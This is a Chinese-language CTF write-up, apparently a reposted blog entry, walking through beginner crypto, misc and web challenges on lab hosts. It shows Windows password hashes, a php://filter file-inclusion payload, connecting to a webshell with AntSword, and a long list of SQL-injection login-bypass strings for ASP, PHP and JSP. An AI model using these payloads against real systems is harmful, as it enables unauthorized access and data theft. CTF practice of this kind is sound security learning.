Crypto
Windows系統密碼
首先拿到題目,我們打開看一下,它后綴是.hash,雙擊之后我們發現打不開,這種情況有兩種原因,一是我們沒有安裝相應的軟體,二是該檔案被毀壞了,然后我們嘗試用記事本打開看一下,結果發現原來重點在這:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ctf:1002:06af9108f2e1fecf144e2e8adef09efd:a7fcb22a88038f35a8f39d503e7f0062:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:bef14eee40dffbc345eeb3f58e290d56:::
我們觀察一下,發現ctf后面有兩個序列都是滿足MD5加密格式


然后我們就一個一個試,終于發現第二個可以解密正確的格式,然后它就是我們的答案了
Misc
[BJDCTF 2nd]小姐姐-y1ng
首先我們打開題目給的圖片
(看到這么漂亮的小姐姐,你有沒有心動呢),嘻嘻,我們還是專心做題吧,照著正常流程走,我們把它放到winhex中,看一下頭和尾,沒有什么發現,然后我們再搜索一下文本flag,還是無果,我們再來看一下題目,BJDCTF,嗯…我們試著輸一下BJD沒想到結果出來了
Web
[ACTF2020 新生賽]Include1
首先我們打開題目鏈接http://56f3dad7-edff-4011-bb6c-ee4c8b0dab81.node3.buuoj.cn,跟著提示我們一步一步打開然后看到一句話
你能夠發現flag嗎,點開原始碼,沒有發現什么,然后看到網址找到它是.php型別的,知道了它是考察利用php://filter偽協議進行檔案包含構造payload = http://5165ec02-c72d-4737-85c5-295e639ea759.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php,把它輸入網址上然后我們就可以看到
然后我們base64解密得到答案
[極客大挑戰 2019]Knife1
打開題目鏈接,http://db65a8cb-49ec-4028-8dc6-2ef21a55557b.node3.buuoj.cn,一張圖片迎面而來
題目:白給的shell,讓我想起了上一周做的webshell,然后我們打開蟻劍輸入相應的網址和密碼,密碼就是圖片中所提示的syc
然后點擊添加,這樣就添加好了
然后我們雙擊進去,打開它的根目錄
找到這個flag,然后打開就好了
[極客大挑戰 2019]EasySQL1
首先我們打開網址http://671f217e-489f-48b8-9a45-d30881488c54.node3.buuoj.cn/看到用戶登錄界面

題目是easysql,所以判斷它應該是SQL注入,然后我們利用萬能密碼注入,可是萬能密碼也有不同型別的,所以我們打開原始碼
發現它是php寫的,所以我們就用php的萬能密碼嘗試,
admim’or’1’=1
連接起來username=admin’ or ‘1’=‘1&password=admin’ or ‘1’=‘1
萬能密碼(摘自百度):
asp aspx萬能密碼
1:"or “a”="a
2:’.).or.(’.a.’=’.a
3:or 1=1–
4:‘or 1=1–
5:a’or’ 1=1–
6:"or 1=1–
7:‘or.‘a.’=‘a
8:“or”="a’=‘a
9:‘or’’=’
10:‘or’=‘or‘
admin’or 1=1#
PHP萬能密碼
admin’/*
密碼*/’
‘or 1=1/*
"or “a”="a
“or 1=1–
“or”=”
“or”="a’=‘a
“or1=1–
“or=or”
'‘or’=‘or’
‘) or (‘a’=‘a
‘.).or.(’.a.’=’.a
'or 1=1
'or 1=1–
'or 1=1/*
'or”="a’=‘a
‘or’ ‘1’=‘1’
‘or’’=’
‘or’’=’‘or’’=’
‘or’=‘1’
‘or’=‘or’
'or.‘a.’=‘a
‘or1=1–
1’or’1’=‘1
a’or’ 1=1–
a’or’1=1–
or ‘a’=‘a’
or 1=1–
or1=1–
jsp 萬能密碼
1’or’1’=‘1
admin’ or 1=1/*
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/171614.html
標籤:其他
上一篇:如何開發一個自己的網站?
下一篇:利用UDP埠轉發繞過校園網認證
